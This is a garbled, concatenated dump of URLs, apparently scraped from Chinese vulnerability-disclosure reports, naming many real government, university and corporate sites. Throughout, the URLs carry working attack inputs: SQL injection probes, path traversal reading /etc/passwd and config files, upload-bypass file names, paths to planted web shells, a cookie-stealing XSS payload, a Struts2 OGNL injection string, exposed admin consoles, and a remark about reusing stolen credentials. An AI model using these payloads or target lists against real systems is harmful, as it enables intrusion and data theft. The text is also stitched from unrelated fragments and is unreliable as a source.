http://pingjia.tjcoc.gov.cn/index.php/user/index/num/100496 post:http://www.aapinche.cn/api/mobile/User.ashx http://v.youku.com/v_show/id_XNzUyMzg4OTMy.html http://jmjtzyy.com/yyghxt/Admin/Admin_Login.asp http://jmjtzyy.com/bbs/Admin/Index.asp http://www.jdair.net/index.jsp http://nba.weibo.com/forum/fans/rank_list?forum_id=7&order_field=post_num&order_type=DESC http://www.jdair.net/index.jsp http://skcostg.sf-express.com/jmx-console/ http://www.qingchifan.com/ http://www.sdaxue.com/u/comment/38665.html http://web.4399.com/hd/xdns2/geren/?id=4399000806 http://www.hbsxhsd.com http://www.hbsxhsd.com//shijiazhuang/upload/images/201153114472909.cer;1.gif http://lib.cnpc.com.cn/bbs/bbs_reply.asp?boardid=3 http://lib.cnpc.com.cn/List.asp?act=MultiQuery&lang=gb&all=111 http://61.142.209.134:81/manager/html http://www.zzfdc.gov.cn/fcxw/new.jsp?id=189065 http://member.8090yxs.com/api/address.php?sname= http://www.bjlyjy.com/) http://www.101dai.com/common-getpasswordemail.shtml http://218.200.200.167/ http://struts.apache.org/release/2.2.x/docs/s2-005.html http://qq.999.com.cn/ http://qq.999.com.cn/mainframe.asp http://qq.999.com.cn/system/AddPhoneRecordChannel.aspx?CustomerID=1&AuthorID=1&ID=1&EditPhoneNo=1&AccessUserID=1&RecInfoInvokeID=1&PhoneTime=1 inurl:edu inurl:classify.asp?cate= http://www.lib.whu.edu.cn/5/news/classify.asp?cate=1 http://geology.nwu.edu.cn:81/jxyd/models/cn/addresslist/edit.asp?id=452 http://beta.zjtvu.edu.cn/Bmwy/kfxy/search/news/classify.asp?cate=1'&id=759&Fid=760&Nav=1 http://mall.zoomla.cn/,也就是 http://www.huaweidevice.com.eg/huawei_ar/sphider/admin/admin.php www.huaweidevice.com.eg http://www.lilyenglish.com/ http://www.dg121.com/ http://www.dg121.com/tld/admin/Admin/Admin_Setting.asp http://www.dg121.com/tld/admin/mEditor_Full.html http://www.dg121.com/tld/201488174128291.aspx dgsqxj:dg+121 http://123.147.164.34:8080/default.aspx http://www.999.com.cn/news2.aspx?tid=18&id=455 http://www.999.com.cn/news2.aspx?tid=18&id=455 http://www.iflytek.com/index.php?a=contactmap&c http://sqlmap.org http://www.qysi.gov.cn/index.jsp http://www.qysi.gov.cn/jsp/website/unitquery/unitcheck1.jsp?org_id=001&AAB001=1 http://canting.deitui.com/ http://health.yeecare.com/company/yeecare.php?id=8625 http://health.yeecare.com/search.php?keywords=%27 http://fankui.163.com/server-info?config http://fankui.163.com/server-info http://210.45.128.60:80/csmain/detailnotice.asp?noticeid=253 http://210.45.128.60//cs/jsjjc/ksxt/commonlogin.asp http://123.147.164.63:8083/login.jsp http://www.huzsafety.gov.cn/proscenium/pxhg/viewPxhgF.xhtml http://www.ltt-hna.com/Index/Default.aspx http://www.ltt-hna.com/Index/TrainingPlanAdmissionNoticeForIndex.aspx?NoticeID=72 http://radio.stu.edu.cn/play.php?id=129 http://ins.cufe.edu.cn/news.asp?bigtype=%B9%FA%BC%CA%BD%BB%C1%F7&smalltype=%B9%FA%BC%CA%BA%CF%D7%F7%CF%EE%C4%BF http://ss.xju.edu.cn/xjusoft/index.do http://sss.bnu.edu.cn/view.php?id=244 inurl:getlist.asp?pmid= http://www.jxgcxy.tzc.edu.cn/sy/getlist.asp?pmid=146&fmid=147 http://www.sqlmap.org www.jxgcxy.tzc.edu.cn\session http://muagent-jp.ceair.com/test/a/user_detail.aspx?usrId=1 http://merchant.test.zol.com/index.php?c=GoodsManagerManu https://reg.163.com重置了该账号密码,问题是生日。。。 http://bio.njau.edu.cn:8003/biocontent.asp?nid=1625&leibie=n91 http://www.foundertech.com/ http://espace.foundertech.com/innerweb/default.aspx http://www1.gdufs.edu.cn/gwyjs/yjsc/specialList.php?specialid=26 http://demo.vgoshop.com/ http://www.feidee.com/money/登陆是有一定限制的,错误几次就会提示禁止登陆。 http://www.hisense.com) Ver:3.5.5 inurl:/ScmUser/login.aspx http://www.sdx.sh.cn/tg/Silic.jsp http://www.sdx.sh.cn/tg/t1.jsp http://www.sdx.sh.cn/tg/fs.jsp http://kczy.zjut.edu.cn/cellweb/Article_Print.asp?ArticleID=90 http://kczy.zjut.edu.cn/cellweb/Admin_Login.asp http://haha.baozou.com/plus/wrong.php?vid=105102+and+123%3D%28select+123+from+mysql.user+limit+1%29+and+sleep%286-6%29 http://221.11.139.173:8083/ http://1.202.236.237:8860/ http://1.202.236.237:8860/Web_3GJiZuFuWuGX/Web_3GJiZuFuWuGX.rar http://221.11.139.173:8083/%E7%A7%BB%E5%8A%A8%E8%BF%90%E8%A1%8C%E7%BD%91%E5%8F%98%E6%9B%B420130130%E5%8F%98%E6%9B%B4%E5%8C%85.rar http://www.wooyun.org/bugs/wooyun-2010-059360,提到的是升腾软件系统的漏洞,一个任意文件下载漏洞,刁飞了~然后打算也去研究一下这个系统,结果发现用户量特别大啊~发现一个注入点,可导致涉及到网上备案系统,危害巨大啊!哈哈,前人任意文件下载都首页,我这注入点就 www.centerm.com.cn/product/productIndex.aspx http://203.93.109.22:8085/jtscxy/portal/ http://www.757599.com/recharge.aspx http://oa.zto.cn/ http://www.ddphp.cn/bm/ http://fwzx.cnta.gov.cn/yjjyNR-list2.asp?t_id=3 http://www.cnhww.com/demo5/admin/login.asp http://pt.3g.qq.com/s?aid=touchLogin&bid_code=qqbuyLogin&css=http%3A%2F%2Fapp.t.qq.com%2Fdownload.php%3Fkey%3D8e1b1ba1-a9de-438a-9f66-a073d7e60da0%26name%3Dhello.css&go_url=http%3A%2F%2Fparty.wanggou.com%2Ftws64%2Fm%2Fh5v1%2FcpLogin%3Frurl%3Dhttp%253A%252F%252Fwww.paipai.com%252Fm2%252Findex.html http://dev.t.qq.com/html/upload.html http://app.t.qq.com/download.php?key=2d5c8fcd-e194-45da-9ba7-0a46c33f0d23&name=hello.css www.szpsun56.com http://www.szpsun56.com/news/html/?518.html http://kyc.heuet.edu.cn/Report/Gensituation.aspx?tableID=4 http://lib.heuet.edu.cn/Pages/NewsDetail.aspx?sysid=548 http://www.zsb.bupt.cn/view_BKemployNews.php?id=477 http://dx.xjtu.edu.cn/ st:http://dx.xjtu.edu.cn/loginAction http://shpt.imust.cn/admin/login.aspx默认进去,发表个投票,得到shell。 http://shopcgi.qqmusic.qq.com/fcgi-bin/shopsearch.fcg?value=%e6%3cimg%20src%3dX%20onerror%3deval%28location.hash.substr%281%29%29%20%e6%3e#alert%28document.cookie%29 http://www.999.com.cn/news.aspx?tid=18 http://sp.ickey.cn/ http://stock.ickey.cn/ http://stock.ickey.cn/user/default http://erp.ickey.cn http://grad.gdufe.edu.cn/detach.portal?.f=f1503&.pmn=view&action=bulletinsMoreView&.ia=false&.pen=pe1141&groupid= http://business.csair.com/page/advertise_findByStatus.action http://my.hb.189.cn:80/app/mobile/get_nums.php?card_type=0&city_code=10%20AND%203*2*1%3d6%20AND%20276%3d276&goods_name=GALAXY%20Note3%20SM-N9009&is_group=0&keywords=&num_id=&num_id_1=&num_id_2=&num_section=%E5%85%A8%E9%83%A8&page=1&per_num=24 http://my.hb.189.cn:80/app/mobile/get_nums.php?card_type=1'%22&city_code=10&goods_name=GALAXY%20Note3%20SM-N9009&is_group=0&keywords=&num_id=&num_id_1=&num_id_2=&num_section=%E5%85%A8%E9%83%A8&page=1&per_num=24 http://bbs.aili.com/plugin.php?id=pointsMall:index&ailibnumto=50&ailibnumfrom=0-0 http://bbs.aili.com/plugin.php?id=pointsMall:index&ailibnumto=50&ailibnumfrom=0-0%20and%201=1 http://bbs.aili.com/plugin.php?id=pointsMall:index&ailibnumto=50&ailibnumfrom=0-0%20and%201=2 http://bbs.kongzhong.com/api.php?mod[]=daliang http://bbs.kongzhong.com/uc_server/control/admin/db.php http://bbs.kongzhong.com/source/plugin/myrepeats/table/table_myrepeats.php http://i.meilishuo.net/config/ http://wooyun.org/bugs/wooyun-2010-040163出在一个地方,但是添加/修改安全邮箱的接口变了,原来的是http://www.vmall.com/member/account/sendEmail.json,这次是http://www.vmall.com/member/updateEmail.json,估计是更改接口时忘记更新安全问题了吧。。。而且这次直接是GET方式。。 https://www.google.com.tw/?gws_rd=ssl#newwindow=1&q=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81:%E5%A5%87%E6%89%8D%E7%A7%91%E6%8A%80+inurl:product.asp http://econ.ruc.edu.cn/displaynews.php?id=11831 http://www.ickey.cn/mobile/?action=login URL:http://58.248.56.80/login.jsp http://58.248.56.80/logs http://58.248.56.79/ http://m.csair.com/上面给用户恶搞订机票啊 http://passport.zhulong.com/message http://218.26.9.232:8090/gzwdoc/ntko/editoffice.jsp?FileId=14 http://www.gamepaopao.com/cmd.jsp http://smarthome.tcl.com/manager/ http://116.228.171.57:8090/ismp/spportal/ http://116.228.171.57:8090/ismp/cnlportal/ http://116.228.171.57:8090/ismp/euportal/ http://116.228.171.57:8090/ismp/opportal/ http://mail.xunway.com/fangmail/cgi/index.cgi SQLURL:http://en.uzai.com/product.aspx?Id=XL20111107745368479 http://www.url.com/xw_view.asp?id=xxx页面存在注入。部分网站是以http://www.url.com/xw_view.asp?id=xxx&xxxxxxxx的形式存在,只需将&xxxx删去即可注入。由于该建站系统不开源(收费还这么不负责),没有漏洞源码,但在谷歌,度娘 inurl:xw_view.asp?id= http://www.chuge8.com/ http://asxb.ashd.gov.cn/showxphoto.asp?action=login http://wapha.189.cn/wap_color/login/login.jsp http://byj.tcl.com/Graduation/GetWorksJson?highType=3&BestOrNewType=new&School=135791&&Name=1357919988 http://202.119.189.248/pyxx/login.aspx url:http://mitv.tcl.com/DRP/register/saveRegisterInfo?emailType=@tcl.com&userRegisterInfo.gender=M&userRegisterInfo.password=admin&userRegisterInfo.currentPassword=admin&userRegisterInfo.firstName=admin&userRegisterInfo.lastName=admin&userRegisterInfo.userLoginId=admin9988 http://voice.tcl.com/protected/config/.svn/entries http://www.csc.edu.cn/laihua/programsearch.aspx?academicDegreLevel=&teachingLanguage=&durationOfStudy=&chineseProficiencyRequire=&tuitionFees=&enrollmentDate=&scholarshipTpye=&programName= jsp:directive.page jsp:directive.page http://chat.uzai.com/ http://oa.bamatea.com http://oa.moonbasa.com http://oa.etonetech.com http://oa.ztcz.cn http://218.249.130.74 http://119.146.190.170:9988 http://zhidao.baidu.com http://wenku.baidu.com http://223.4.22.36 http://222.243.160.83:9090 http://www.chipshow.cn http://116.205.96.170:9090 http://www.sxjbjt.com:9090 http://122.225.203.168:8888 http://oa.chinabed.com http://oa.lutongnet.com http://oa.zetacn.com:9090 http://oa.zhcpt.edu.cn http://www.doc88.com http://oa.sinodata.com.cn http://www.docin.com http://www.koyochem.com:8080 http://61.186.155.27 http://oa.nyinn.cn http://115.236.65.115:9090 http://119.146.190.118:8089 http://219.137.250.133 http://123.133.29.174:9090 http://koa.ecp888.com http://www.cting.com.cn http://oa.suncorps.cn http://59.41.47.211 http://oa.bamatea.com:9090 http://oa.zhenaiws.com http://www.koyochem.com:9191 http://60.208.131.46:9090 http://219.131.221.174:9090 http://oa.bnuz.edu.cn:8080 http://183.238.59.61:9090 http://218.205.208.22:9090 http://oa.xhlbdc.com http://124.193.165.174:9090 http://218.75.87.186:9090 http://oa.eva-group.com:511 http://113.106.92.16:9090 http://oa.cqmsy.com http://cting.com.cn http://220.231.158.211 http://oa.tiholding.cn http://124.172.170.141:9090 http://oa.hengdigroup.com:9090 http://www1.elkay.com.cn:9090 http://www.gzpiano.com http://oa.zaffer.cn http://oa.gdisg.com http://219.129.189.12/ http://www.goldmail.cn/about/hotspot/hotspot_detail.php?ID=168 http://www.zerom.cn/ http://www.saregroup.cn/Project/detail/id/12'.html http://www.xiaheng.net/ URL:http://60.166.52.108:1010/ahcc/login.aspx http://www.gxnun.net/1.asp http://www.gxnun.net/45nnsztw/new/ADMIN/indox.asp http://www.yongche.com/user/add_contact.php?user_contact_id=100001 http://www.goldmail.cn/search.php?keyword=1 http://wjj.haimen.gov.cn/ http://wjj.haimen.gov.cn/view.asp?keyno=886 http://wjj.haimen.gov.cn/view.asp?keyno=886 http://wjj.haimen.gov.cn/hmwj_ggfw.asp?keyno=622%20and%201=1 http://wjj.haimen.gov.cn/view.asp?keyno=991%20and%201=2 http://hmgxq.haimen.gov.cn/view.asp?keyno=2389%20and%201=2 http://www.hmrd.gov.cn/view.asp?keyno=11747%20and%202388=2388 http://dz.haimen.gov.cn/view.asp?keyno=2365%20and%201=2 http://zgh.haimen.gov.cn/view.asp?keyno=3461%20and%201=2 http://clz.haimen.gov.cn/view.asp?keyno=2311%20and%201=2 http://women.haimen.gov.cn/view.asp?keyno=4177%20and%201=2 http://hbsz.e21.cn/login.php a.jpg/a.asp;a.jpg等不会被拦截。 a.jpg/a.asp;a.jpg等会被拦截。 http://localhost/pic.asp;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.jpg http://localhost/屯屯.asp;.jpg http://localhost/pic.asp;屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯.jpg http://d.longtugame.com/k520?user_id=12857617 http://torder.chanjet.com/Login_Order_NEW.aspx url:http://jsjy.hfjy.net.cn/hbadmin/Welcome.asp url:http://jsjy.hfjy.net.cn/UpFile/2014810212451.asp http://wordpress.org/news/2014/08/wordpress-3-9-2/ https://www.drupal.org/SA-CORE-2014-004 http://demo.zoomla.cn/Admin/i/Shop/OrderList.aspx?Province=&city= http://demo.zoomla.cn/Admin/I/Shop/Orderlistinfo.aspx?id=9 http://demo.zoomla.cn/Admin/I/Content/ShowContent.aspx?GID=43&modeid=19 http://demo.zoomla.cn/Admin/Template/LabelManage.aspx http://demo.zoomla.cn/Admin/Content/NodeManage.aspx http://demo.zoomla.cn/Admin/User/AdminManage.aspx http://demo.zoomla.cn/Admin/User/AddManage.aspx ip:42.96.185.111 http://42.96.185.111:9200/index http://q.letv.com/question/1925页面,还有http://q.letv.com/article/269同样存在存储型xss,在该页面评论,如图 http://q.letv.com/article/269 http://q.letv.com/article/268页面同样存在存储型xss http://q.letv.com/article/267页面同样存在存储型xss http://q.letv.com/article/268依次变量268这个数字就可以了 site:cgbchina.com.cn filetype:jsp https://shop.cgbchina.com.cn/CgbMall/jsp/brandQuery.jsp?gid=131&goods_price=中有个gid参数,用1=1尝试一下,结果返回,变量类型错误,看来没法注入了 https://shop.cgbchina.com.cn/BusinessCityWeb/ecity.do?func=queryClassFun&dom= http://xsser.l1n3.net/WY6NN2?1407683427 http://127.0.0.1/admin/huiyuandetail.asp?id=831 http://www.hr135.com/ask/index.php http://www.hr135.com/ask/index.php?c=content&id=162 http://www.tipask.com/ http://user.ci123.com/account/ManageAccount http://www.neverwinterol.com.cn/《无冬0L》Xbox官方站点存在struts2安全漏洞 http://bbs.173.com/forum.php http://pc.mmb.cn http://pc.mmb.cn/wap/pc/user/login.jsp http://www.sonkwo.com/users/171785 http://webcache.googleusercontent.com/search?q=cache:GnX3VCP1vS8J:ftp://58.52.195.203/%25D0%25C5%25CF%25A2%25D6%25D0%25D0%25C4/%25D0%25C5%25CF%25A2%25D6%25D0%25D0%25C4%25CD%25F8%25C2%25E7%25C9%25E8%25B1%25B8%25D7%25CA%25C1%25CF%25BC%25B0%25C1%25AA%25CF%25B5%25B5%25E7%25BB%25B0.doc+&cd=168&hl=zh-CN&ct=clnk&gl=cn&lr=lang_zh-CN%7Clang_zh-TW FTP://10.46.1.201无开机密码, http://www.dyzw.gov.cn/newsshow.asp?id=1739 http://top.shenchuang.com/index.asp?pushid=420678 http://system.denachina.com/mobage_oa/ http://system.denachina.com/mobage_oa/index.php/user/absence_info/6653 http://jsjy.hebtu.edu.cn/showclass.asp?classid=8 http://xsc.hebtu.edu.cn/list.php?class=0 http://io.hebtu.edu.cn:8080/newsite/list_detail.php?clevel=11 http://hb.zjnu.edu.cn/search.asp http://www.wooyun.org/searchbug.php intitle:FE协作办公平台 http://www.hebmu.edu.cn/user/reg.aspx?TypeId=1 http://www.hebmu.edu.cn/user/reg.aspx?TypeId=1 1.asp/201408/20140811121344106111.jpg http://daq.cn/?fr=67001,与买卖宝是同一家,试试刚才偷来的买卖宝的帐号test123,密码:123456 http://www.whfzb.gov.cn/site/frontpage/webApply/login.action http://cstc.lib.stu.edu.cn/ http://cstc.lib.stu.edu.cn/Articleview.asp?ArticleID=10039 http://cstc.lib.stu.edu.cn/Articleview.asp?ArticleID=10039%27 http://cstc.lib.stu.edu.cn/Articleview.asp http://cstc.lib.stu.edu.cn/Articleview.asp http://struts.apache.org/release/2.3.x/docs/s2-019.html http://www.boyaa.com.hk/s/ir_circular.php?year=2014 http://www.boyaa.com.hk/s/media.php?year=2014 http://www.boyaa.com.hk/s/ir_present.php?year=2014 http://www.chukong.com/ http://www.chinastarch.com.hk/ http://www.boyaa.com.hk/ http://www.todayir.com/ http://www.xhnmedia.com.hk http://project.todayir.com/ http://www.mediachina-corp.com/ http://i.178.com/~blog.index.index/ http://news.usst.edu.cn/login.asp?id=1 http://drops.wooyun.org/papers/548 http://124.74.70.126:8080/login.do http://www.quyou.com/login/index.aspx http://www.xinnet.com/user/user.do?method=toFindPwd http://nerc.edu.cn/FrontEnd/default.html http://www.rsc.sdu.edu.cn/2010new2/boshihou/index.php?owner=8 http://www.gbpx.sdu.edu.cn/theme/standard/gaoxiao32/main_more.html?type=0 http://www.gbpx.sdu.edu.cn/theme/standard/gaoxiao32/main.html?subjectid=40 http://home.focus.cn/group/group_forum.php http://report.uzai.com/File/db.txt http://wap.ha.10086.cn/login.action inurl:catalog.jsp?flag inurl:FAQView.jsp inurl:newsdetails.jsp?type= http://www.qhdzw.gov.cn/details/newsdetails.jsp?type=InfoTPXW&infoid=2031 http://www.xsxzfwzx.gov.cn/details/newsdetails.jsp?type=InfoTPXW&infoid=00000693 http://211.141.115.19/details/newsdetails.jsp?type=InfoTPXW&infoid=00000332 http://61.180.86.32:8008/details/newsdetails.jsp?type=InfoZWGK&infoid=313 http://117.40.186.185:8008/outportal/details/newsdetails.jsp?type=InfoTPXW&infoid=309 http://117.40.239.74/outportal/details/newsdetails.jsp?type=InfoTPXW&infoid=00000450 http://61.180.72.3/details/newsdetails.jsp?type=InfoZXDT&infoid=301 http://117.40.187.175:8008/outportal/details/newsdetails.jsp?type=InfoTPXW&infoid=00000351 http://60.170.27.13/news_details.jsp?type=InfoGZYW&infoid=3207 http://218.65.59.94/outportal/details/newsdetails.jsp?type=InfoTPXW&infoid=00000319 http://xzfw.nc.gov.cn/details/newsdetails.jsp?type=InfoTPXW&infoid=00001131 http://www.bbxzfw.gov.cn/news_details.jsp?type=InfoGZYW&infoid=3199 http://222.133.56.86:8080/ecgapout/details/newsdetails.jsp?type=InfoTPXW&infoid=00000441 http://117.43.10.254:8008/outportal/details/newsdetails.jsp?type=InfoXXGG&infoid=319 http://117.40.239.74/outportal/details/newsdetails.jsp?type=InfoTPXW&infoid=313 http://www.syspfw.com/details/newsdetails.jsp?type=InfoTPXW&infoid=00000363 http://120.203.196.125/details/newsdetails.jsp?type=InfoTPXW&infoid=00000321 http://wssp.lepingshi.gov.cn/outportal/details/newsdetails.jsp?type=InfoTPXW&infoid=00000425 http://wssp.jdz.gov.cn/outportal/details/newsdetails.jsp?type=InfoTPXW&infoid=00000720 http://www.jxtgxzfw.gov.cn/outportal/details/newsdetails.jsp?type=InfoTPXW&infoid=00000630 http://xzsp.poyang.gov.cn/outportal/details/newsdetails.jsp?type=InfoTPXW&infoid=00001677 http://seller.cctvmall.com/cshop/manage/login font-size:99px;position left:0;right:0;background width:100%;padding http://www.oschina.net/code/snippet_865087_37950 inurl:include/content.php?id= http://www.xxx.gov.cn/include/video.php?id=4 http://www.xxx.gov.cn/include/content.php?id=3289 http://www.xceda.gov.cn/include/content.php?id=3289 http://www.sqlmap.org www.xceda.gov.cn\session http://rsc.fzu.edu.cn/listzp.php?id=224 http://cjy.fzu.edu.cn/zkb/zkluntan/forum.asp?forum_id=1 http://zsd.fzu.edu.cn/viewnews.asp?id=796 http://iamc.fzu.edu.cn/column.php?pid=12 http://iamc.fzu.edu.cn/article.php?aid=385 http://jwjc.hue.edu.cn/index.php?action=show&id=150 http://dlgl.sipo.gov.cn/freeze.main?filePath=../../../../../../../../../../etc/passwd&txn-code=ImgOutServlet&type=agent,可读取相关文件信息: appmfl.com/?informationshow/tp/211/id/15.html http://www.bjndlz.gov.cn/level2.jsp?caid=002 http://www.deitui.com/index.php?m=html&a=down http://www.studyinlnu.com/xx_list.asp?bid=39 http://218.7.13.214:82/admin/upload.asp http://218.7.13.214:82/Upload/lan.asp;20147261723969379.jpg http://218.7.13.214:82/Upload/milu.asp;.jpg20148112139252821.jpg inurl:inurl:zsdt.asp?class_ID= https://www.google.com.hk/?gfe_rd=cr&ei=IcHoU6PuFoqK8QewmIHYDA&gws_rd=ssl#newwindow=1&q=inurl:zsdt.asp%3Fclass_ID%3D&safe=strict http://www.issence.com/ http://www.cqbbsourcing.gov.cn/download.php?file=./../includes/config_inc.php http://yxxf.swu.edu.cn/download.php?file=./../includes/config_inc.php http://www.cqljjr.com/download.php?file=./../includes/config_inc.php http://www.cqxiaoma.com/download.php?file=./../includes/config_inc.php http://pharmacy.swu.edu.cn/download.php?file=./../includes/config_inc.php http://www.cqjbso.gov.cn/download.php?file=./../includes/download.php http://www.fctl.com.cn/download.php?file=./../includes/config_inc.php inurl:zcfg_read.asp?id= http://209.116.186.246/#newwindow=1&q=inurl:zcfg_read.asp%3Fid%3D&start=0 http://60.8.102.174/zcfg_read.asp?id=2433 http://www.hyxzfw.gov.cn/new_read.asp?id=3296 http://www.wyxzfw.com/zcfg_read.asp?id=4028 http://www.xlinfo.gov.cn/zcfg_read.asp?ID=23 http://www.ccxzwzx.gov.cn/zcfg_read.asp?id=29280 http://www.gzshebao.org/zcfg_read.asp?id=2105 http://www.jshuaqiao.com/new_read.asp?id=2652 http://www.esensoft.com.cn/ inurl:grpslogin.jsp http://219.135.157.142:9000/irpt/i/oem/grpslogin.jsp http://zdsy.cq-l-tax.gov.cn/oem/grpslogin.jsp http://218.94.69.69:7003/irpt/i/oem/suzhouds/ssl/grpslogin.jsp?taskGroup=ZDSY2014 http://www.szltax.gov.cn:7101/i/oem/suzhouds/ssl/grpslogin.jsp?taskGroup=2014NZDSYJKYBB_SJ_ http://tongji.chinatally.com:8080/irpt/oem/grpslogin.jsp https://web1.nb-n-tax.gov.cn:7006/sszl/i/oem/grpslogin.jsp http://61.132.47.120:8090/oem/grpslogin.jsp http://218.92.100.83:7010/oem/grpslogin.jsp http://110.249.221.9:9000/i/oem/grpslogin.jsp http://218.5.65.189/oem/grpslogin.jsp http://tj.hecom.gov.cn/oem/grpslogin.jsp http://221.229.123.251:7001/i/oem/grpslogin.jsp http://218.28.24.36:9999/i/oem/grpslogin.jsp http://61.133.94.3:8001/oem/grpslogin.jsp http://218.93.18.190:8080/irpt/i/oem/grpslogin.jsp http://www.li-ning.com.cn/uploadfile/07029/2014072945099.html http://fx.sx.189.cn/sousuo.do?action=lhss http://www.2cto.com/Article/201103/85391.html http://note.youdao.com/yws/mapi/bindemail?method=sendadd&email=攻击者邮箱地址 cn:9090 http://x.x.x.x/uploadfile?istrade=istrade&filename=../WEB-INF/web.xml http://x.x.x.x//uploadfile?istrade=istrade&filename=../../../../../etc/passwd http://im.dhzq.com.cn:9090/uploadfile?istrade=istrade&filename=../WEB-INF/web.xml http://im.dhzq.com.cn:9090/uploadfile?istrade=istrade&filename=../../../../../etc/passwd inurl:readnews.php?class= http://jsjdj.wuhai.gov.cn/readnews.php?class=%D6%CA%BC%E0%D0%C5%CF%A2&id=945 http://www.whsfxzw.gov.cn/readnews.php?class=%B1%EA%CC%E2%C0%B8&id=1354 http://zgh.wuhai.gov.cn/readnews.php?class=%B1%EA%CC%E2%C0%B8&subclass=%D5%FE%B2%DF%B7%A8%B9%E6&id=585 http://www.nmwhrd.gov.cn/readnews.php?class=一府两院&subclass=重要文件&id=695 http://www.whyz.gov.cn/readnews.php?class=%D0%C2%CE%C5%B7%FE%CE%F1&subclass=%D4%CB%B9%DC%B6%AF%CC%AC&id=190 http://ajj.wuhai.gov.cn/readnews.php?class=应急预案&subclass=应急预案&id=90 http://zsj.wuhai.gov.cn/readnews.php?class=%D5%D0%C9%CC%B6%AF%CC%AC&subclass=%D5%D0%C9%CC%B6%AF%CC%AC&id=797 http://218.28.193.146:15000/jmx-console/ http://218.28.193.146:15000/web-console/ http://218.28.193.146:15000/jmx-console/ http://218.28.193.146:15000/web-console/ inurl:/news/newsmore.aspx?lid= http://www.xjjtsg.com/news/NewsMore.aspx?lid=81 http://www.sqlmap.org http://home.sdchina.com/search.aspx?keystr= inurl:SPEVideoPage.aspx?KindSetID= inurl:SPENewsList.aspx?KindSetID= http://www.azxx.net/dpma/FWeb/SPEWeb/Web/SPENewsList.aspx?KindSetID=1000001&sid=305001 http://www.azxx.net/dpma/FWeb/SPEWeb/Web/SPEVideoPage.aspx?KindSetID=30 http://www.whwzyx.net/dpma/FWeb/WorkRoomWeb/Web/Index.aspx?TID=31800100 http://www.sqlmap.org http://www.phpweb.org/webmall/detail.php?id=%27+1+%27 http://www.ybc.org.cn/news/subspecialnews.jsp?specialid=40&positions=14 http://sd.119.gov.cn/xiaofang/ http://sd.119.gov.cn/console http://59.75.129.109/newslist.aspx?titleSearch=%E4%BF%A1%E6%81%AF%E5%AD%A6%E9%99%A2 http://oa.huedu.net/EduOA/default.asp www.xxx.com/W_admin/ http://www.shviki.cn/w_admin/ http://www.jafisure.com/w_admin/ http://www.xitang100.cc/w_admin/ http://www.hnzhongxinhe.com/w_admin/ http://www.jafisure.com/w_admin/ http://www.happyhouse.cn/w_admin/ http://www.ligao365.cn/w_admin/ http://www.xinlongjs.com.cn/w_admin/ http://www.mlfs.cc/W_admin/ http://www.wulinbaby.com/w_admin/ http://www.yiqianls.com/w_admin/ http://www.cesafety.cn/login.action?website=gzsep http://ptcms.csdn.net/article/service/article_count?preview=1&aid=2821007 http://yp.oss.org.cn/software/show_cat.php?cat_id=17 http://lbs.189.cn/dianping http://lbs.189.cn/dianping/coupon.php?act=detail&id=782 http://sdst.zjnu.edu.cn/ sdst.zjnu.edu.cn/search.asp?imageField2.x=5&imageField2.y=7&keywords=1 www.cqupt.edu.cn/cqupt/List.jsp?Type=news http://www.cqupt.edu.cn/login.jsp http://demo.easethink.com/t1/index.php IP:182.92.163.204 htpp://oa.kjkd.com/BusinessFrm/ http://oa.kjkd.com/BusinessFrm/FileDowdLoadWFM.aspx?filePath=../web.config&fileName=../web.config http://bbs.bccn.net/zzz/bzml/view.php?fid=* http://bbs.bccn.net/zzz/bzml/view.php?fid=* http://www.17500.cn/p3/p3detail.php?i=2014193 http://baidu.csdn.net/rec.html?title=2&url=http://developer.baidu.com/wiki/index.php?title=docs/pcs google:inurl:/webschool/BBS shell:http://www.ir.zju.edu.cn/web/up_file/201309/137894906040.php https://github.com/kurui/TPP/tree/master/defaultroot/WEB-INF https://github.com/kurui/TPP/blob/master/defaultroot/WEB-INF/applicationContext-base.xml jdbc:oracle:thin:@172.18.42.65:1521:sqpt jdbc:oracle:thin:@202.104.150.234:1521:orcl jdbc:oracle:thin:@192.168.1.226:1521:orcl jdbc:oracle:thin:@192.168.150.1:1521:orcl intitle:FE协作办公平台 http://www.gzcdc.org.cn/education/ajax.Aspx?act=submitTel&tel=* http://www.gzcdc.org.cn/education/ajax.Aspx?act=submitTel&tel=* http://zhaopin.longtugame.com/html/90sec.php http://mili.umiwi.com/huodong/leimingquest?uid=6025033&n=3 http://m.58.com/cs/cwzengsong/18047282901898x.shtml?refrom=wap http://blog.qiniu.com https://github.com/ronalfei/mailbus/blob/master/src/mailbus_smtp_client.erl https://47922a86f536d9b5.box.lenovo.com/user/signin或直接访问https://box.lenovo.com/user/signin inurl:ahsffyww/ZXDefault2.action inurl:ahsffyww/fjck.action inurl:ahsffyww/wssq.action inurl:/ahsffyww/wszx.action inurl://ahsffyww/wsts.action http://61.191.213.82:1980/ahsffyww/ZXDefault2.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D 